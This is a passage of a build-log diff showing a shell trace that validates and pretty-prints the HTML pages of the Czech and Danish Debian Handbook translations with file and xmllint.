++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.task-scheduling-cron-atd.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.ubuntu.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtual-private-network.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.virtualization.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-emulation.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html publish/cs-CZ/Debian/9/html/debian-handbook/sect.windows-file-server-with-samba.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/security.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/security.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/security.html publish/cs-CZ/Debian/9/html/debian-handbook/security.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html publish/cs-CZ/Debian/9/html/debian-handbook/the-debian-project.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html publish/cs-CZ/Debian/9/html/debian-handbook/unix-services.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/website.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/website.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/website.html publish/cs-CZ/Debian/9/html/debian-handbook/website.html
++ read _FILE_PATH
++ file --brief --mime-type publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html
++ xmllint --noout publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html
++ xmllint --pretty 2 --output publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html
++ read _FILE_PATH
 + file --brief --mime-type publish/da-DK/Debian/9/html/debian-handbook/advanced-administration.html
 + xmllint --noout publish/da-DK/Debian/9/html/debian-handbook/advanced-administration.html
 + xmllint --pretty 2 --output publish/da-DK/Debian/9/html/debian-handbook/advanced-administration.html publish/da-DK/Debian/9/html/debian-handbook/advanced-administration.html
@@ -22553,6 +23081,518 @@ Would remove tmp/
 + xmllint --noout tmp/ar-MA/html/workstation.html
 + xmllint --pretty 2 --output tmp/ar-MA/html/workstation.html tmp/ar-MA/html/workstation.html
 + read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/advanced-administration.html
++ xmllint --noout tmp/cs-CZ/html/advanced-administration.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/advanced-administration.html tmp/cs-CZ/html/advanced-administration.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/apt.html
++ xmllint --noout tmp/cs-CZ/html/apt.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/apt.html tmp/cs-CZ/html/apt.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/backcover.html
++ xmllint --noout tmp/cs-CZ/html/backcover.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/backcover.html tmp/cs-CZ/html/backcover.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/basic-configuration.html
++ xmllint --noout tmp/cs-CZ/html/basic-configuration.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/basic-configuration.html tmp/cs-CZ/html/basic-configuration.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/case-study.html
++ xmllint --noout tmp/cs-CZ/html/case-study.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/case-study.html tmp/cs-CZ/html/case-study.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/conclusion.html
++ xmllint --noout tmp/cs-CZ/html/conclusion.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/conclusion.html tmp/cs-CZ/html/conclusion.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/debian-packaging.html
++ xmllint --noout tmp/cs-CZ/html/debian-packaging.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/debian-packaging.html tmp/cs-CZ/html/debian-packaging.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/derivative-distributions.html
++ xmllint --noout tmp/cs-CZ/html/derivative-distributions.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/derivative-distributions.html tmp/cs-CZ/html/derivative-distributions.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/existing-setup.html
++ xmllint --noout tmp/cs-CZ/html/existing-setup.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/existing-setup.html tmp/cs-CZ/html/existing-setup.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/foreword.html
++ xmllint --noout tmp/cs-CZ/html/foreword.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/foreword.html tmp/cs-CZ/html/foreword.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/index.html
++ xmllint --noout tmp/cs-CZ/html/index.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/index.html tmp/cs-CZ/html/index.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/installation.html
++ xmllint --noout tmp/cs-CZ/html/installation.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/installation.html tmp/cs-CZ/html/installation.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/network-infrastructure.html
++ xmllint --noout tmp/cs-CZ/html/network-infrastructure.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/network-infrastructure.html tmp/cs-CZ/html/network-infrastructure.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/network-services.html
++ xmllint --noout tmp/cs-CZ/html/network-services.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/network-services.html tmp/cs-CZ/html/network-services.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/packaging-system.html
++ xmllint --noout tmp/cs-CZ/html/packaging-system.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/packaging-system.html tmp/cs-CZ/html/packaging-system.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/preface.html
++ xmllint --noout tmp/cs-CZ/html/preface.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/preface.html tmp/cs-CZ/html/preface.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.acknowledgments.html
++ xmllint --noout tmp/cs-CZ/html/sect.acknowledgments.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.acknowledgments.html tmp/cs-CZ/html/sect.acknowledgments.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.administration-interfaces.html
++ xmllint --noout tmp/cs-CZ/html/sect.administration-interfaces.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.administration-interfaces.html tmp/cs-CZ/html/sect.administration-interfaces.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.after-first-boot.html
++ xmllint --noout tmp/cs-CZ/html/sect.after-first-boot.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.after-first-boot.html tmp/cs-CZ/html/sect.after-first-boot.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.apparmor.html
++ xmllint --noout tmp/cs-CZ/html/sect.apparmor.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.apparmor.html tmp/cs-CZ/html/sect.apparmor.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.apt-cache.html
++ xmllint --noout tmp/cs-CZ/html/sect.apt-cache.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.apt-cache.html tmp/cs-CZ/html/sect.apt-cache.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.apt-frontends.html
++ xmllint --noout tmp/cs-CZ/html/sect.apt-frontends.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.apt-frontends.html tmp/cs-CZ/html/sect.apt-frontends.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.apt-get.html
++ xmllint --noout tmp/cs-CZ/html/sect.apt-get.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.apt-get.html tmp/cs-CZ/html/sect.apt-get.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.aptosid.html
++ xmllint --noout tmp/cs-CZ/html/sect.aptosid.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.aptosid.html tmp/cs-CZ/html/sect.aptosid.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html
++ xmllint --noout tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html tmp/cs-CZ/html/sect.asynchronous-task-scheduling-anacron.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.automated-installation.html
++ xmllint --noout tmp/cs-CZ/html/sect.automated-installation.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.automated-installation.html tmp/cs-CZ/html/sect.automated-installation.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.automatic-upgrades.html
++ xmllint --noout tmp/cs-CZ/html/sect.automatic-upgrades.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.automatic-upgrades.html tmp/cs-CZ/html/sect.automatic-upgrades.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.backup.html
++ xmllint --noout tmp/cs-CZ/html/sect.backup.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.backup.html tmp/cs-CZ/html/sect.backup.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.becoming-package-maintainer.html
++ xmllint --noout tmp/cs-CZ/html/sect.becoming-package-maintainer.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.becoming-package-maintainer.html tmp/cs-CZ/html/sect.becoming-package-maintainer.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.book-structure.html
++ xmllint --noout tmp/cs-CZ/html/sect.book-structure.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.book-structure.html tmp/cs-CZ/html/sect.book-structure.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.building-first-package.html
++ xmllint --noout tmp/cs-CZ/html/sect.building-first-package.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.building-first-package.html tmp/cs-CZ/html/sect.building-first-package.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html
++ xmllint --noout tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html tmp/cs-CZ/html/sect.coexistence-with-other-packaging-systems.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.collaborative-work.html
++ xmllint --noout tmp/cs-CZ/html/sect.collaborative-work.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.collaborative-work.html tmp/cs-CZ/html/sect.collaborative-work.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.common-procedures.html
++ xmllint --noout tmp/cs-CZ/html/sect.common-procedures.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.common-procedures.html tmp/cs-CZ/html/sect.common-procedures.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.computer-layers.html
++ xmllint --noout tmp/cs-CZ/html/sect.computer-layers.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.computer-layers.html tmp/cs-CZ/html/sect.computer-layers.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.config-bootloader.html
++ xmllint --noout tmp/cs-CZ/html/sect.config-bootloader.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.config-bootloader.html tmp/cs-CZ/html/sect.config-bootloader.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.config-misc.html
++ xmllint --noout tmp/cs-CZ/html/sect.config-misc.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.config-misc.html tmp/cs-CZ/html/sect.config-misc.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.config-printing.html
++ xmllint --noout tmp/cs-CZ/html/sect.config-printing.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.config-printing.html tmp/cs-CZ/html/sect.config-printing.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.creating-accounts.html
++ xmllint --noout tmp/cs-CZ/html/sect.creating-accounts.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.creating-accounts.html tmp/cs-CZ/html/sect.creating-accounts.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.customizing-graphical-interface.html
++ xmllint --noout tmp/cs-CZ/html/sect.customizing-graphical-interface.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.customizing-graphical-interface.html tmp/cs-CZ/html/sect.customizing-graphical-interface.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html
++ xmllint --noout tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.debian-internals.html
++ xmllint --noout tmp/cs-CZ/html/sect.debian-internals.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.debian-internals.html tmp/cs-CZ/html/sect.debian-internals.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.development.html
++ xmllint --noout tmp/cs-CZ/html/sect.development.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.development.html tmp/cs-CZ/html/sect.development.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.devuan.html
++ xmllint --noout tmp/cs-CZ/html/sect.devuan.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.devuan.html tmp/cs-CZ/html/sect.devuan.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.dhcp.html
++ xmllint --noout tmp/cs-CZ/html/sect.dhcp.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.dhcp.html tmp/cs-CZ/html/sect.dhcp.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.dist-upgrade.html
++ xmllint --noout tmp/cs-CZ/html/sect.dist-upgrade.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.dist-upgrade.html tmp/cs-CZ/html/sect.dist-upgrade.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.domain-name-servers.html
++ xmllint --noout tmp/cs-CZ/html/sect.domain-name-servers.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.domain-name-servers.html tmp/cs-CZ/html/sect.domain-name-servers.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.doudoulinux.html
++ xmllint --noout tmp/cs-CZ/html/sect.doudoulinux.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.doudoulinux.html tmp/cs-CZ/html/sect.doudoulinux.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.download-the-book.html
++ xmllint --noout tmp/cs-CZ/html/sect.download-the-book.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.download-the-book.html tmp/cs-CZ/html/sect.download-the-book.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.download-the-electronic-version.html
++ xmllint --noout tmp/cs-CZ/html/sect.download-the-electronic-version.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.download-the-electronic-version.html tmp/cs-CZ/html/sect.download-the-electronic-version.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.dynamic-routing.html
++ xmllint --noout tmp/cs-CZ/html/sect.dynamic-routing.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.dynamic-routing.html tmp/cs-CZ/html/sect.dynamic-routing.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.filesystem-hierarchy.html
++ xmllint --noout tmp/cs-CZ/html/sect.filesystem-hierarchy.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.filesystem-hierarchy.html tmp/cs-CZ/html/sect.filesystem-hierarchy.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.firewall-packet-filtering.html
++ xmllint --noout tmp/cs-CZ/html/sect.firewall-packet-filtering.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.firewall-packet-filtering.html tmp/cs-CZ/html/sect.firewall-packet-filtering.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.follow-debian-news.html
++ xmllint --noout tmp/cs-CZ/html/sect.follow-debian-news.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.follow-debian-news.html tmp/cs-CZ/html/sect.follow-debian-news.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.foundation-documents.html
++ xmllint --noout tmp/cs-CZ/html/sect.foundation-documents.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.foundation-documents.html tmp/cs-CZ/html/sect.foundation-documents.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.ftp-file-server.html
++ xmllint --noout tmp/cs-CZ/html/sect.ftp-file-server.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.ftp-file-server.html tmp/cs-CZ/html/sect.ftp-file-server.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.future-of-debian.html
++ xmllint --noout tmp/cs-CZ/html/sect.future-of-debian.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.future-of-debian.html tmp/cs-CZ/html/sect.future-of-debian.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.future-of-this-book.html
++ xmllint --noout tmp/cs-CZ/html/sect.future-of-this-book.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.future-of-this-book.html tmp/cs-CZ/html/sect.future-of-this-book.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.graphical-desktops.html
++ xmllint --noout tmp/cs-CZ/html/sect.graphical-desktops.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.graphical-desktops.html tmp/cs-CZ/html/sect.graphical-desktops.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.grml.html
++ xmllint --noout tmp/cs-CZ/html/sect.grml.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.grml.html tmp/cs-CZ/html/sect.grml.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.hostname-name-service.html
++ xmllint --noout tmp/cs-CZ/html/sect.hostname-name-service.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.hostname-name-service.html tmp/cs-CZ/html/sect.hostname-name-service.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.hotplug.html
++ xmllint --noout tmp/cs-CZ/html/sect.hotplug.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.hotplug.html tmp/cs-CZ/html/sect.hotplug.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.how-to-migrate.html
++ xmllint --noout tmp/cs-CZ/html/sect.how-to-migrate.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.how-to-migrate.html tmp/cs-CZ/html/sect.how-to-migrate.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.http-ftp-proxy.html
++ xmllint --noout tmp/cs-CZ/html/sect.http-ftp-proxy.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.http-ftp-proxy.html tmp/cs-CZ/html/sect.http-ftp-proxy.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.http-web-server.html
++ xmllint --noout tmp/cs-CZ/html/sect.http-web-server.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.http-web-server.html tmp/cs-CZ/html/sect.http-web-server.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.inetd.html
++ xmllint --noout tmp/cs-CZ/html/sect.inetd.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.inetd.html tmp/cs-CZ/html/sect.inetd.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.installation-steps.html
++ xmllint --noout tmp/cs-CZ/html/sect.installation-steps.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.installation-steps.html tmp/cs-CZ/html/sect.installation-steps.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.ipv6.html
++ xmllint --noout tmp/cs-CZ/html/sect.ipv6.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.ipv6.html tmp/cs-CZ/html/sect.ipv6.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.kali.html
++ xmllint --noout tmp/cs-CZ/html/sect.kali.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.kali.html tmp/cs-CZ/html/sect.kali.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.kernel-compilation.html
++ xmllint --noout tmp/cs-CZ/html/sect.kernel-compilation.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.kernel-compilation.html tmp/cs-CZ/html/sect.kernel-compilation.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.kernel-installation.html
++ xmllint --noout tmp/cs-CZ/html/sect.kernel-installation.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.kernel-installation.html tmp/cs-CZ/html/sect.kernel-installation.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.kernel-role-and-tasks.html
++ xmllint --noout tmp/cs-CZ/html/sect.kernel-role-and-tasks.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.kernel-role-and-tasks.html tmp/cs-CZ/html/sect.kernel-role-and-tasks.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.knoppix.html
++ xmllint --noout tmp/cs-CZ/html/sect.knoppix.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.knoppix.html tmp/cs-CZ/html/sect.knoppix.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.ldap-directory.html
++ xmllint --noout tmp/cs-CZ/html/sect.ldap-directory.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.ldap-directory.html tmp/cs-CZ/html/sect.ldap-directory.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.linux-mint.html
++ xmllint --noout tmp/cs-CZ/html/sect.linux-mint.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.linux-mint.html tmp/cs-CZ/html/sect.linux-mint.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.main-desktop-tools.html
++ xmllint --noout tmp/cs-CZ/html/sect.main-desktop-tools.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.main-desktop-tools.html tmp/cs-CZ/html/sect.main-desktop-tools.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html
++ xmllint --noout tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html
++ xmllint --pretty 2 --output tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html tmp/cs-CZ/html/sect.manipulating-packages-with-dpkg.html
++ read _FILE_PATH
++ file --brief --mime-type tmp/cs-CZ/html/sect.master-plan.html
